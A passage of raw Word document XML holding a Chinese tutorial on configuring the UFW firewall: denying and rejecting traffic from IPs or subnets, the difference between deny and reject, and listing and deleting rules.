      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>deny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果您未更改默认策略，除非打开指定端口的连接，否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会阻止所有传入连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A83571C" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB17A80" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>撰写拒绝规则与撰写允许规则相同。您只需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>deny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B57C96" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5779322D" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>假设您打开了端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且服务器受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>23.24.25.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络的攻击。要拒绝来自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>23.24.25.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86BE37" w14:textId="77777777" w:rsidR="00B928DA" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F72C4C" w14:textId="4F3C23F7" w:rsidR="00047951" w:rsidRDefault="00B928DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw deny from 23.24.25.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令将会拒绝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>23.24.25.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网段的连接，如果你仅需要拒绝指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址的连接，则不需要添加子网掩码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7320D3" w14:textId="1ABF1ABE" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FEA3AB" w14:textId="77777777" w:rsidR="00685DDC" w:rsidRDefault="00685DDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你还可以拒绝指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址连接到指定的端口，例如命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00336F8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw deny proto tcp from 23.24.25.0/24 to any port 80,443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。将会拒绝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>23.24.25.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D993F7" w14:textId="77777777" w:rsidR="00685DDC" w:rsidRDefault="00685DDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C0D060" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRPr="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>deny</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2406F9F9" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> deny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作时，防火墙会</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默默地丢弃被拒绝的数据包，而不向源发送任何响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB08C1D" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，源主机将继续尝试发送数据包，直到达到超时或放弃为止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC1964" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种动作会使得攻击者难以确定目标主机是否在线，因为他们不会收到拒绝连接的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66D789" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但这也可能导致一些问题，比如可能会使得攻击者更难以确定是由于网络故障还是被防火墙拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767842E" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29469149" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRPr="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reject</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13405651" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> reject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>防火墙会发送一条</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3365A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>错误消息（如“目标不可达”）给源主机，通知其连接被拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C2F21" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，这将导致源主机立即收到拒绝连接的响应，从而不再尝试建立连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72949624" w14:textId="6DE8C653" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="00E3365A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> deny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> reject </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作会立即通知源主机连接被拒绝，这样可以更快地释放网络资源并减少攻击者的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB63848" w14:textId="77777777" w:rsidR="00E3365A" w:rsidRDefault="00E3365A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0E3118" w14:textId="77777777" w:rsidR="00685DDC" w:rsidRPr="00F06A0A" w:rsidRDefault="00685DDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw deny from 23.24.25.100 #</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>拒绝指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E13CC" w14:textId="77777777" w:rsidR="00685DDC" w:rsidRPr="00F06A0A" w:rsidRDefault="00685DDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw deny from 23.24.25.0/24  #</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>整个网段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071A791" w14:textId="23CA6E26" w:rsidR="00047951" w:rsidRPr="00F06A0A" w:rsidRDefault="00685DDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw deny proto tcp from 23.24.25.0/24 to any port 80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D68C25" w14:textId="3238E07F" w:rsidR="00047951" w:rsidRPr="00F06A0A" w:rsidRDefault="00F06A0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>拒绝使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>reject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DEABDF" w14:textId="76546089" w:rsidR="00F06A0A" w:rsidRPr="00F06A0A" w:rsidRDefault="00F06A0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06A0A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ufw reject from 202.54.5.7 to any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E200D9" w14:textId="6559C0F6" w:rsidR="00047951" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看并删除防火墙规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02556F" w14:textId="1D94699B" w:rsidR="00047951" w:rsidRDefault="00047951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A41076" w14:textId="65B009E4" w:rsidR="00047951" w:rsidRPr="00115386" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115386">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw status numbered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DCF2B" w14:textId="6B715E63" w:rsidR="00336F8D" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F8A84F" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假设要删除的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则编号是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该规则号允许连接到端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。你可运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CA4DF" w14:textId="0DD7B99E" w:rsidR="00242659" w:rsidRPr="00115386" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115386">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo ufw delete 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00115386">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDD5A1" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB95A6D" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二种方法是通过指定实际规则来删除规则。例如，如果您打开了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的规则，则可以运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw delete allow 8069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将其删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEF8BE" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A294F4A" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw status numbered #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看防火墙的状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3A18D" w14:textId="77777777" w:rsidR="00242659" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw delete 3 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据编号删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EFDE3" w14:textId="2AE965A2" w:rsidR="00336F8D" w:rsidRDefault="00242659" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00115386">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo ufw delete allow 8069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过规则删除规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E28CF0" w14:textId="5D016779" w:rsidR="00336F8D" w:rsidRDefault="00336F8D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19EB6BE5" w14:textId="37BAAB9F" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A7E54" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果出于某些原因要停止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UFW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并停用所有规则，则可以运行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo ufw disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用防火墙。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D47D1" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED8D49A" w14:textId="77777777" w:rsidR="00FA0EB1" w:rsidRDefault="00FA0EB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后，如果您想重新启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ufw</w:t>
      </w:r>
      <w:r>
